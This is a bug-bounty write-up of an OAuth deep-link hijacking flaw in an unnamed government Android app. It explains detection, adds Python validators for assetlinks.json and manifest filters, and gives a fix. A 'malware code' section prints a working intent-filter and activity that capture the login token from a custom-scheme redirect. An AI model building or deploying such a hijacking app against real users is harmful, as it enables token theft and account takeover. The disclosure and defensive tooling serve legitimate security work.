TALE OF A VULNERABILITY WHICH LEADS TO ACCOUNT TAKEOVER OF GOVERNMENT ANDROID APPLICATION


Karthikeyan.V

AGENDA:

. THINGS YOU SHOULD KNOW TO UNDERSTAND THE VULNERABILITY

. DESCRIPTION OF THIS VULNERABILITY

. STEPS TO IDENTIFY

. IMPACT

. CONCLUSION

THINGS TO KNOW TO UNDERSTAND THE VULNERABILITY

1. WHAT IS A DEEP LINK AND HOW DO DEEP LINKS WORK

2. A BASIC UNDERSTANDING OF OAUTH

I REQUEST YOU TO READ MY PREVIOUS BLOG TO UNDERSTAND THE WORKING PRINCIPLE OF THIS VULNERABILITY.

DESCRIPTION :

THESE KINDS OF BUGS OCCUR IN MOBILE APPLICATIONS THAT INTEGRATE OAUTH WITH A CUSTOM DEEP LINK. IF THE APPLICATION TRUSTS THE OAUTH REDIRECT DELIVERED THROUGH AN UNVERIFIED CUSTOM DEEP LINK, THE VULNERABILITY CAN BE EXPLOITED.

MISCONFIGURED OAUTH DEEP LINK WHICH LEADS TO ACCOUNT TAKEOVER

NOTE: THE APPLICATION NAME CANNOT BE DISCLOSED PUBLICLY. Let’s use the term “vulnerable app” throughout this blog for clarity.

This application offers three OAuth login options:

. Google OAuth

. Microsoft OAuth

. Apple ID OAuth

Let’s consider this scenario:

When the user opens the vulnerable application and tries to log in with OAuth (specifically Microsoft OAuth), the app launches the default mobile browser, which asks for Microsoft credentials. On successful login, the browser automatically redirects back to the application through a custom deep link, and this deep link carries the user’s OAuth token.

In the previous blog < link > I already mentioned that some Android applications are vulnerable to this attack when the deep link is not properly configured.

Action performed: if the deep-link malware application from the previous blog is adapted to the vulnerable app’s scheme, it is possible to hijack the vulnerable application’s OAuth deep link.

So now the malware application is installed on my mobile and the same login process is repeated, but this time the malware application receives the deep link that carries the valid OAuth token. That’s it: by this process the malware application successfully hijacks the token.

For clear understanding :

This is an example of how the deep link looks:

vulnerableapp://login?token=ffdryur6iukit7tu756

STEPS TO IDENTIFY :

1. CHECK FOR OAUTH LOGIN IN THE APPLICATION AND CHECK WHETHER IT LAUNCHES A MOBILE BROWSER WHEN YOU TRY TO LOG IN WITH OAUTH.

2. CHECK WHETHER THE DIGITAL ASSET LINKS JSON FILE IS PRESENT ON THE APPLICATION’S DOMAIN, i.e. https://vulnerable.com/.well-known/assetlinks.json. IF THIS FILE IS NOT PRESENT, THE APP MAY BE VULNERABLE.

3. CREATE THE MALWARE APPLICATION WITH THE SAME DEEP LINK AS THE VULNERABLE APP, THEN TRY TO LOG IN WITH OAUTH.
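Step 2 above is the check a defender or auditor repeats most often, so here is a small validator for the Digital Asset Links file. This is an added example, not code from the original post: it takes the text served at /.well-known/assetlinks.json, the app’s package name and its signing-certificate SHA-256 fingerprint, and reports whether the domain actually binds its links to that app. The sample statement list, package name and fingerprint are constructed placeholders; in practice you fetch the file over HTTPS and read the fingerprint from the signing certificate of the installed APK.

```python
import json

# Constructed sample of a Digital Asset Links statement list, as served from
# https://<domain>/.well-known/assetlinks.json. Package name and fingerprint are placeholders.
SAMPLE_ASSETLINKS = """
[
  {
    "relation": ["delegate_permission/common.handle_all_urls"],
    "target": {
      "namespace": "android_app",
      "package_name": "com.example.vulnerableapp",
      "sha256_cert_fingerprints": [
        "AA:BB:CC:DD:EE:FF:00:11:22:33:44:55:66:77:88:99:AA:BB:CC:DD:EE:FF:00:11:22:33:44:55:66:77:88:99"
      ]
    }
  }
]
"""

# The relation Android requires before it will auto-verify an https intent filter
HANDLE_ALL_URLS = "delegate_permission/common.handle_all_urls"


def normalize_fingerprint(fp: str) -> str:
    """Fingerprints are compared ignoring colons, spaces and letter case."""
    return fp.replace(":", "").replace(" ", "").upper()


def app_is_authorized(assetlinks_text, package_name, cert_fingerprint):
    """Return (ok, reason): does the statement list bind the domain's links to
    this package signed with this certificate?"""
    try:
        statements = json.loads(assetlinks_text)
    except json.JSONDecodeError as exc:
        return False, f"assetlinks.json is not valid JSON: {exc}"
    if not isinstance(statements, list):
        return False, "assetlinks.json must be a JSON array of statements"
    wanted = normalize_fingerprint(cert_fingerprint)
    for stmt in statements:
        target = stmt.get("target", {})
        if target.get("namespace") != "android_app":
            continue
        if target.get("package_name") != package_name:
            continue
        if HANDLE_ALL_URLS not in stmt.get("relation", []):
            return False, "package listed but without the handle_all_urls relation"
        fingerprints = [normalize_fingerprint(f)
                        for f in target.get("sha256_cert_fingerprints", [])]
        if wanted in fingerprints:
            return True, "package and signing certificate are authorized for App Links"
        return False, "package listed but signing certificate fingerprint does not match"
    return False, "package not listed; its deep links are not verifiable"


def audit(assetlinks_text_or_none, package_name, cert_fingerprint):
    """Step 2 of the write-up: a missing file is the first red flag, because without
    it the app can only rely on an unverified custom scheme."""
    if assetlinks_text_or_none is None:
        return False, "no /.well-known/assetlinks.json served; verified App Links impossible"
    return app_is_authorized(assetlinks_text_or_none, package_name, cert_fingerprint)


if __name__ == "__main__":
    print(audit(SAMPLE_ASSETLINKS, "com.example.vulnerableapp",
                "aabbccddeeff00112233445566778899aabbccddeeff00112233445566778899"))
    print(audit(None, "com.example.vulnerableapp", "00"))
```

A result of “not listed” or “fingerprint does not match” means that even if the app declares an https intent filter, Android will not verify it, and the login redirect falls back to whatever app claims the custom scheme.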

MALWARE CODE

Add this to the AndroidManifest.xml file with the vulnerable app’s deep link (the VIEW action and the DEFAULT and BROWSABLE categories are required for the filter to receive a browser redirect):

<intent-filter>
    <action android:name="android.intent.action.VIEW" />
    <category android:name="android.intent.category.DEFAULT" />
    <category android:name="android.intent.category.BROWSABLE" />
    <data android:scheme="vulnerableapp" android:host="login" />
</intent-filter>

MainActivity.java code

import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.widget.TextView;

public class MainActivity extends Activity {
    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.main);
        TextView text = (TextView) findViewById(R.id.tid);
        // The launching intent carries the deep-link URI, including the token, as its data
        Intent intent = getIntent();
        Uri data = intent.getData();
        // data is null when the activity is opened from the launcher rather than via the deep link
        text.setText(data != null ? data.toString() : "no deep link data");
    }
}

This code reads the deep-link data and writes it into the malware app’s text view; the malware app needs no permissions to perform this attack.

IMPACT:

USING THIS FLAW THERE IS A HIGH POSSIBILITY OF ACCOUNT TAKEOVER.

CONCLUSION :

To fix this, add the .well-known/assetlinks.json file to the authorized domain. Any OAuth login activity should be completed within that application only; if the login asks you to enter credentials in an unknown third-party application, it is not safe to log in.

I hope you understand the impact of this vulnerability. If you wish to learn about mobile app bug bounty, check out the link below.
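The conclusion names the file to add; on the app side the matching change is to move the login redirect from the custom scheme to an https intent filter marked android:autoVerify="true", which Android checks against that assetlinks.json. The following added example (not code from the original post or the affected app) shows the weak filter from the write-up beside the corrected one in a constructed manifest fragment, and a small auditor that flags BROWSABLE filters an unrelated app could claim. The package name, activity name and host are placeholders.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed manifest fragment: the first filter is the weak custom-scheme one from the
# write-up, the second is the corrected https App Link. Names and host are placeholders.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.vulnerableapp">
  <application>
    <activity android:name=".LoginActivity" android:exported="true">
      <!-- Weak: any installed app may declare the same custom scheme -->
      <intent-filter>
        <action android:name="android.intent.action.VIEW" />
        <category android:name="android.intent.category.DEFAULT" />
        <category android:name="android.intent.category.BROWSABLE" />
        <data android:scheme="vulnerableapp" android:host="login" />
      </intent-filter>
      <!-- Corrected: https App Link, verified against /.well-known/assetlinks.json -->
      <intent-filter android:autoVerify="true">
        <action android:name="android.intent.action.VIEW" />
        <category android:name="android.intent.category.DEFAULT" />
        <category android:name="android.intent.category.BROWSABLE" />
        <data android:scheme="https" android:host="vulnerable.example" android:path="/login" />
      </intent-filter>
    </activity>
  </application>
</manifest>
"""


def attr(element, name):
    """Read a namespaced android:<name> attribute."""
    return element.get(f"{{{ANDROID_NS}}}{name}")


def audit_manifest(manifest_xml):
    """Return one finding per BROWSABLE intent-filter data element:
    (activity name, scheme, host, verdict)."""
    root = ET.fromstring(manifest_xml)
    findings = []
    for activity in root.iter("activity"):
        for filt in activity.findall("intent-filter"):
            categories = {attr(c, "name") for c in filt.findall("category")}
            if "android.intent.category.BROWSABLE" not in categories:
                continue  # not reachable from a browser redirect
            auto_verify = attr(filt, "autoVerify") == "true"
            for data in filt.findall("data"):
                scheme, host = attr(data, "scheme"), attr(data, "host")
                if scheme in ("http", "https") and auto_verify:
                    verdict = "ok: verified App Link (needs matching assetlinks.json)"
                elif scheme in ("http", "https"):
                    verdict = "weak: web scheme without autoVerify, other apps can claim it too"
                else:
                    verdict = "weak: custom scheme can be claimed by any installed app"
                findings.append((attr(activity, "name"), scheme, host, verdict))
    return findings


def hijackable_filters(manifest_xml):
    """Only the findings a reviewer needs to act on."""
    return [f for f in audit_manifest(manifest_xml) if f[3].startswith("weak")]


if __name__ == "__main__":
    for finding in audit_manifest(SAMPLE_MANIFEST):
        print(finding)
```

Removing the custom-scheme filter entirely, rather than keeping both, is the point: as long as the OAuth redirect can still land on vulnerableapp://login, the verified https filter does not protect the token.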

Credits

VULNERABILITY DISCOVERED BY: karthithehacker (Karthikeyan.V)

WRITER: AGNES RUSALIYA

For further inquiries or more information about this vulnerability, you can reach out to:

POC by: @karthithehacker
Mail: contact@karthithehacker.com
Website: https://www.karthithehacker.com/

If you’re interested in our VAPT service, contact us at ceo@cappriciosec.com or contact@cappriciosec.com.

For enrolling my cybersecurity and Bugbounty course,

WhatsApp +91 82709 13635.

Mail: contact@karthithehacker.com
Website: karthithehacker.com
Twitter: @karthithehacker
Instagram: @karthithehacker
LinkedIn: Karthikeyan.V
GitHub: Karthi the Hacker
npmjs: @karthithehacker
YouTube: https://www.youtube.com/@karthi_the_hacker

For VAPT services, reach out at ceo@cappriciosec.com or Contact@cappriciosec.com.

Thank you

Karthikeyan.V
